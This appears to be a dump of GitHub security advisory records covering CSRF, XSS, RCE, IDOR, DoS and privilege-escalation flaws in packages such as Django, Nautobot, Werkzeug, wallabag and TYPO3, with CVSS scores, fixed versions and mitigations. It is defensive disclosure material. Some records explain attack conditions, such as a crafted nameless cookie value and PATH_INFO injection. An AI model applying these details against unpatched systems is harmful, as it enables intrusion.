{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:11:33Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}
1.4.0
GHSA-p4xx-w6fr-c4w9
2023-02-10T00:20:55Z
2023-02-02T06:30:26Z
null
['CVE-2023-25015']
Clockwork Web contains a Cross-Site Request Forgery Vulnerability with Rails < 5.2
Clockwork Web before 0.1.2, when used with Rails before 5.2 is used, allows Cross-Site Request Forgery (CSRF). A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include enabling and disabling jobs. All users running an affected release on Rails < 5.2 should upgrade immediately.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'clockwork_web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25015'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/issues/4'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/commit/ec2896503ee231588547c2fad4cb93a94e78f857'}, {'type': 'PACKAGE', 'url': 'https://github.com/ankane/clockwork_web'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/compare/v0.1.1...v0.1.2'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/clockwork_web/CVE-2023-25015.yml'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T23:07:04Z', 'nvd_published_at': '2023-02-02T04:15:00Z'}
1.4.0
GHSA-344m-qcjq-xgrf
2023-02-14T00:30:22Z
2023-02-14T00:30:22Z
null
[]
Vulnerable OpenSSL included in sgx-dcap-quote-verify-python
sgx-dcap-quote-verify-python includes a statically linked copy of OpenSSL. The version of OpenSSL included in sgx-dcap-quote-verify-python 0.0.1..0.0.2 is vulnerable to a security issue. More details about the OpenSSL vulnerabilities themselves can be found at https://www.openssl.org/news/secadv/20230207.txt. ## Analysis The binding includes OpenSSL version 1.1.1s which is vulnerable to the vulnerabilities disclosed in [OpenSSL Security Advisory from the 7th February 2023](https://www.openssl.org/news/secadv/20230207.txt). The binding does not directly use OpenSSL. The binding calls the SGX Quote Verification Library which uses OpenSSL. ## Explanation The SGX Quote Verification Library uses OpenSSL as a dependency to perform its cryptographic operations and certificate verification. The OpenSSL security advisory mentions multiple vulnerabilities but I believe the most concerning would be CVE-2023-0286 “X.400 address type confusion in X.509 GeneralName”. Its severity is rated high and the advisory states that “this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.” Relying on CRLs obtained from an untrusted party is exactly what can happen when verifying a quote. For instance, the vulnerability could be triggered through the "sgx_qv_verify_quote" function which can take untrusted quote collateral as input. The quote collateral contains a CRL and certificate chains. The Quote Verification Library uses OpenSSL to verify the validity of those in order to establish the authenticity of the quote. Thus the vulnerability could be exploited with corrupted/forged collateral and quote. ## Impact According to the advisory the "vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service". Transitively I expect the same to be true for the Quote Verification Library. The denial of service impact is not much of a concern I believe since processing forged collateral would most likely stop the software from proceeding normally anyway (forged collateral should be rejected). The part regarding the ability to read memory contents, could result in information disclosure which is a real concern. The quote verification happens on the relying party end, which might use it to check enclave authenticity before providing sensitive data, this vulnerability could therefore result in the leakage of sensitive data.
[]
[{'package': {'ecosystem': 'PyPI', 'name': 'sgx-dcap-quote-verify-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/mithril-security/sgx-dcap-quote-verify-python/security/advisories/GHSA-344m-qcjq-xgrf'}, {'type': 'PACKAGE', 'url': 'https://github.com/mithril-security/sgx-dcap-quote-verify-python'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:30:22Z', 'nvd_published_at': None}
1.4.0
GHSA-2hrw-hx67-34x6
2023-02-23T21:23:27Z
2023-02-15T03:30:47Z
null
['CVE-2023-24580']
Resource exhaustion in Django
An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.7'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24580'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/628b33a854a9c68ec8a0c51f382f304a0044ec92'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/83f1ea83e4553e211c1c5a0dfc197b66d4e50432'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/a665ed5179f5bbd3db95ce67286d0192eff041d8'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/4.1/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/02/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FKYVMMR7RPM6AHJ2SBVM2LO6D3NGFY7B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HWY6DQWRVBALV73BPUVBXC3QIYUM24IK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LTZVAKU5ALQWOKFTPISE257VCVIYGFQI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VZS4G6NSZWPTVXMMZHJOJVQEPL3QTO77/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YJB6FUBBLVKKG655UMTLQNN6UQ6EDLSP/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230316-0006/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2023/feb/14/security-releases/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/14/1'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T17:42:14Z', 'nvd_published_at': '2023-02-15T01:15:00Z'}
1.4.0
GHSA-8mfq-f5wj-vw5m
2023-03-03T23:16:35Z
2023-02-22T00:04:02Z
null
['CVE-2023-25657']
Nautobot vulnerable to remote code execution via Jinja2 template rendering
### Impact _What kind of vulnerability is it? Who is impacted?_ All users of Nautobot versions earlier than 1.5.7 are impacted. In Nautobot 1.5.7 we have enabled sandboxed environments for the Jinja2 template engine used internally for template rendering for the following objects: - `extras.ComputedField` - `extras.CustomLink` - `extras.ExportTemplate` - `extras.Secret` - `extras.Webhook` While we are not aware of any active exploits, we have made this change as a preventative measure to protect against any potential remote code execution attacks utilizing maliciously crafted template code. This change forces the Jinja2 template engine to use a [`SandboxedEnvironment`](https://jinja.palletsprojects.com/en/3.0.x/sandbox/#sandbox) on all new installations of Nautobot. This addresses any potential unsafe code execution everywhere the helper function `nautobot.utilities.utils.render_jinja2` is called. Additionally, our documentation that was previously suggesting the direct use of `jinja2.Template` has been revised to utilize `render_jinja2`. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes. Users should upgrade to Nautobot 1.5.7 or newer. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ##### Enabling Sandboxed Environments For users that are unable to upgrade to the latest release of Nautobot, you may add the following setting to your `nautobot_config.py` to apply the sandbox environment enforcement: ```python TEMPLATES[1]["OPTIONS"]["environment"] = "jinja2.sandbox.SandboxedEnvironment" ``` After applying this change, you must restart all Nautobot services, including any Celery worker processes. **Note:** *Nautobot specifies two template engines by default, the first being “django” for the Django built-in template engine, and the second being “jinja” for the Jinja2 template engine. This recommended setting will update the second item in the list of template engines, which is the Jinja2 engine.* ##### Restricting Jinja2 using Access Controls For users that are unable to immediately update their configuration such as if a Nautobot service restart is too disruptive to operations, access to provide custom Jinja2 template values may be mitigated using permissions to restrict “change” (write) actions to the affected object types listed in the first section. **Note:** *This solution is intended to be stopgap until you can successfully update your `nautobot_config.py` or upgrade your Nautobot instance to apply the sandboxed environment enforcement.* #### Updating Existing App or Job Code For Nautobot App (formerly plugin) authors or Job authors, additionally we recommend that if you have any custom code that may for example be using `jinaj2.Template` that you no longer use that. Instead, please always use our `nautobot.utilities.utils.render_jinja2` function which will make sure that the centrally-provided Jinja2 template engine with sandboxing enforced is being utilized. Anywhere you’ve been using this pattern: ```python from jinja2 import Template my_template = Template(template_code) config = my_template.render(context) ``` We recommend that you replace it with this pattern: ```python from nautobot.utilities.utils import render_jinja2 config = render_jinja2(template_code, context) ``` ### References _Are there any links users can visit to find out more?_ Please see the Nautobot 1.5.7 release notes. https://docs.nautobot.com/projects/core/en/stable/release-notes/version-1.5/#v157-2023-01-04
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'nautobot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/nautobot/nautobot/security/advisories/GHSA-8mfq-f5wj-vw5m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25657'}, {'type': 'WEB', 'url': 'https://github.com/nautobot/nautobot/commit/d47f157e83b0c353bb2b697f911882c71cf90ca0'}, {'type': 'WEB', 'url': 'https://docs.nautobot.com/projects/core/en/stable/release-notes/version-1.5/#v157-2023-01-04'}, {'type': 'PACKAGE', 'url': 'https://github.com/nautobot/nautobot'}, {'type': 'WEB', 'url': 'https://jinja.palletsprojects.com/en/3.0.x/sandbox/#sandbox'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:02Z', 'nvd_published_at': '2023-02-21T21:15:00Z'}
1.4.0
GHSA-g9ph-r9hc-34r8
2023-02-22T19:16:24Z
2023-02-21T00:30:20Z
null
['CVE-2021-32853']
Erxes vulnerable to Cross-site Scripting
Erxes, an experience operating system (XOS) with a set of plugins, is vulnerable to cross-site scripting in all versions. This results in client-side code execution. The victim must follow a malicious link or be redirected there from malicious web site. There are no known patches.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'erxes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32853'}, {'type': 'PACKAGE', 'url': 'https://github.com/erxes/erxes'}, {'type': 'WEB', 'url': 'https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54'}, {'type': 'WEB', 'url': 'https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-103-erxes/'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:24Z', 'nvd_published_at': '2023-02-20T23:15:00Z'}
1.4.0
GHSA-gvg3-83q4-rfhq
2023-02-22T22:17:59Z
2023-02-14T15:30:28Z
null
['CVE-2023-25141']
Command injection in Apache Sling
Apache Sling JCR Base < 3.1.12 has a critical injection vulnerability when running on old JDK versions (JDK 1.8.191 or earlier) through utility functions in RepositoryAccessor. The functions getRepository and getRepositoryFromURL allow an application to access data stored in a remote location via JDNI and RMI. Users of Apache Sling JCR Base are recommended to upgrade to Apache Sling JCR Base 3.1.12 or later, or to run on a more recent JDK.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.jcr.base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25141'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base/commit/6ed0a030fd5f13774aff0073c55cbe3ace0153cb'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base/commit/779d8a7dd0437a4f31de02c0d995afcf83b9904b'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SLING-11770'}, {'type': 'WEB', 'url': 'https://sling.apache.org/news.html'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:24:47Z', 'nvd_published_at': '2023-02-14T13:15:00Z'}
1.4.0
GHSA-qh6w-pq52-qxxq
2023-03-01T01:49:02Z
2023-02-19T03:30:18Z
null
['CVE-2023-0914']
Pixelfed may allow unauthorized actor to view private posts
Improper Authorization in GitHub repository pixelfed/pixelfed 0.11.4 and prior.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pixelfed/pixelfed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.11.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0914'}, {'type': 'WEB', 'url': 'https://github.com/pixelfed/pixelfed/commit/ef56f92c3d77e9bafaa70c08b7c04d5a61b8d454'}, {'type': 'PACKAGE', 'url': 'https://github.com/pixelfed/pixelfed'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/54d5fd76-e038-4eda-9e03-d5e95e09c0ec'}]
{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:37Z', 'nvd_published_at': '2023-02-19T01:15:00Z'}
1.4.0
GHSA-7j9m-j397-g4wx
2023-03-03T22:58:41Z
2023-02-21T21:30:18Z
null
['CVE-2022-48282']
MongoDB .NET/C# Driver vulnerable to Deserialization of Untrusted Data
Under very specific circumstances, a privileged user is able to cause arbitrary code to be executed which may cause further disruption to services. This is specific to applications written in C#. This affects all MongoDB .NET/C# Driver versions prior to and including v2.18.0
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'MongoDB.Driver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.19.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48282'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongodb/mongo-csharp-driver'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-csharp-driver/releases/tag/v2.19.0'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/CSHARP-4475'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CSHARP-4475'}]
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:58:41Z', 'nvd_published_at': '2023-02-21T19:15:00Z'}
1.4.0
GHSA-qwx8-mxxx-mg96
2023-02-02T19:27:29Z
2023-02-02T19:26:44Z
null
['CVE-2023-0609']
wallabag contains Improper Authorization via export feature
# Description The export feature lets a user export a single entry or a set of entries in a given format (_e.g. PDF, MOBI, TXT_). For example, `https://yourinstance.wallabag.org/export/45.pdf` will export the entry with id 45 in PDF format. Since wallabag 2.0.0-alpha.1, this feature is vulnerable to an insecure direct object reference attack. A logged user can export any single entry without ownership validation. This is due to a lack of access validation in the `downloadEntryAction` method. **You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration.** # Resolution A user check is now done in the vulnerable method before sending the exported entry. The `Entry` retrieval through a `ParamConverter` has also been replaced with a call to the `EntryRepository` in order to prevent any information disclosure through response discrepancy. # Workaround If you are unable to update to the latest version or if you want to temporarily limit risk of exploitation, you may consider blocking requests to the endpoint `/export/*`. E.g. with nginx: ``` nginx location /export { deny all; } ``` # Credits We would like to thank @bAuh0lz for reporting this issue through huntr.dev. Reference: https://www.huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0/
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.5.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-qwx8-mxxx-mg96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0609'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/0f7460dbab9e29f4f7d2944aca20210f828b6abb'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0'}]
{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:44Z', 'nvd_published_at': None}
1.4.0
GHSA-mjv2-6jv4-vrg7
2023-03-03T23:11:14Z
2023-02-23T15:33:05Z
null
['CVE-2023-0867']
OpenNMS Meridian and Horizon vulnerable to Cross-site Scripting
Multiple stored and reflected cross-site scripting vulnerabilities in webapp jsp pages in multiple versions of OpenNMS Meridian and Horizon could allow an attacker access to confidential session information.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0867'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5765'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/9a366e6822479579e642b58058568af37658baba'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2022/releasenotes/changelog.html#releasenotes-changelog-Meridian-2022.1.13'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:11:14Z', 'nvd_published_at': '2023-02-23T15:15:00Z'}
1.4.0
GHSA-px8h-6qxv-m22q
2023-02-15T15:37:03Z
2023-02-15T15:37:03Z
null
['CVE-2023-23934']
Incorrect parsing of nameless cookies leads to __Host- cookies bypass
Browsers may allow "nameless" cookies that look like `=value` instead of `key=value`. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like `=__Host-test=bad` for another subdomain. Werkzeug <= 2.2.2 will parse the cookie `=__Host-test=bad` as `__Host-test=bad`. If a Werkzeug application is running next to a vulnerable or malicious subdomain which sets such a cookie using a vulnerable browser, the Werkzeug application will see the bad cookie value but the valid cookie key.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Werkzeug'}, 'ecosystem_specific': {'affected_functions': ['werkzeug.http.parse_cookie']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/security/advisories/GHSA-px8h-6qxv-m22q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23934'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/commit/cf275f42acad1b5950c50ffe8ef58fe62cdce028'}, {'type': 'PACKAGE', 'url': 'https://github.com/pallets/werkzeug'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/releases/tag/2.2.3'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5470'}]
{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:37:03Z', 'nvd_published_at': '2023-02-14T20:15:00Z'}
1.4.0
GHSA-vf8h-2wwj-jq22
2023-06-27T21:05:30Z
2023-02-15T12:30:26Z
null
['CVE-2022-42735']
Privilege escalation in Apache ShenYu
Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shenyu:shenyu-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-42735'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/pull/3958'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shenyu'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/2k8764jmckmc19qc8x51nlnngq71pcf7'}]
{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:16:56Z', 'nvd_published_at': '2023-02-15T10:15:00Z'}
1.4.0
GHSA-qgc7-mgm3-q253
2023-06-13T23:47:06Z
2023-02-17T13:59:44Z
null
['CVE-2022-41727']
Uncontrolled Resource Consumption in golang.org/x/image
An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41727'}, {'type': 'WEB', 'url': 'https://go.dev/cl/468195'}, {'type': 'WEB', 'url': 'https://go.dev/issue/58003'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1572'}]
{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T13:59:44Z', 'nvd_published_at': '2023-02-28T18:15:00Z'}
1.4.0
GHSA-6fcj-9vfw-jq2m
2023-02-23T22:07:44Z
2023-02-13T21:31:04Z
null
['CVE-2023-24188']
Arbitrary file deletion in ureport
ureport v2.2.9 was discovered to contain an arbitrary file deletion vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.ureport:ureport2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.9'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24188'}, {'type': 'WEB', 'url': 'https://github.com/Venus-WQLab/bug_report/blob/main/ureport/ureport-cve-2023-24188.md'}, {'type': 'WEB', 'url': 'https://github.com/cgddgc/vulns/blob/main/ureport2-filedelete-vuln.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/youseries/ureport'}, {'type': 'WEB', 'url': 'http://ureport.com'}]
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:28:52Z', 'nvd_published_at': '2023-02-13T20:15:00Z'}
1.4.0
GHSA-mgmm-cmhj-2h5f
2023-03-03T00:15:14Z
2023-02-22T09:30:18Z
null
['CVE-2023-0949']
modoboa Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - Reflected in GitHub repository modoboa/modoboa prior to 2.0.45.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0949'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/aa74e9a4a870162eea169e0a6a2eab841f8811b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ef87be4e-493b-4ee9-9738-44c55b8acc19'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:30Z', 'nvd_published_at': '2023-02-22T09:15:00Z'}
1.4.0
GHSA-r4f8-f93x-5qh3
2023-02-16T19:07:25Z
2023-02-08T21:33:24Z
null
['CVE-2023-24814']
TYPO3 is vulnerable to Cross-Site Scripting via frontend rendering
> ### CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L/E:F/RL:O/RC:C` (8.2) ### Problem TYPO3 core component `GeneralUtility::getIndpEnv()` uses the unfiltered server environment variable `PATH_INFO`, which allows attackers to inject malicious content. In combination with the TypoScript setting [`config.absRefPrefix=auto`](https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/frontend/Classes/Controller/TypoScriptFrontendController.php#L2547-L2549), attackers can inject malicious HTML code into pages that have not yet been rendered and cached. As a result, injected values would be cached and delivered to other website visitors (persisted cross-site scripting). Individual code which relies on the resolved value of [`GeneralUtility::getIndpEnv('SCRIPT_NAME')`](https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/core/Classes/Utility/GeneralUtility.php#L2481-L2484) and corresponding usages (as shown below) are vulnerable as well. - `GeneralUtility::getIndpEnv('PATH_INFO') ` - `GeneralUtility::getIndpEnv('SCRIPT_NAME') ` - `GeneralUtility::getIndpEnv('TYPO3_REQUEST_DIR')` - `GeneralUtility::getIndpEnv('TYPO3_REQUEST_SCRIPT')` - `GeneralUtility::getIndpEnv('TYPO3_SITE_PATH')` - `GeneralUtility::getIndpEnv('TYPO3_SITE_SCRIPT')` - `GeneralUtility::getIndpEnv('TYPO3_SITE_URL')` Installations of TYPO3 versions 8.7 and 9.x are probably only affected when server environment variable [`TYPO3_PATH_ROOT`](https://docs.typo3.org/m/typo3/reference-coreapi/9.5/en-us/ApiOverview/Environment/Index.html#configuring-environment-paths) is defined - which is the case if they were installed via Composer. Additional investigations confirmed that Apache and Microsoft IIS web servers using PHP-CGI (FPM, FCGI/FastCGI, or similar) are affected. There might be the risk that nginx is vulnerable as well. It was not possible to exploit Apache/mod_php scenarios. ### Solution The usage of server environment variable `PATH_INFO` has been removed from corresponding processings in `GeneralUtility::getIndpEnv()`. Besides that, the public property `TypoScriptFrontendController::$absRefPrefix` is encoded for both being used as a URI component and for being used as a prefix in an HTML context. This mitigates the cross-site scripting vulnerability. Update to TYPO3 versions 8.7.51 ELTS, 9.5.40 ELTS, 10.4.36 LTS, 11.5.23 LTS and 12.2.0 that fix the problem described above. > ℹ️ **Strong security defaults - Manual actions required** > Any web server using PHP-CGI (FPM, FCGI/FastCGI, or similar) needs to ensure that 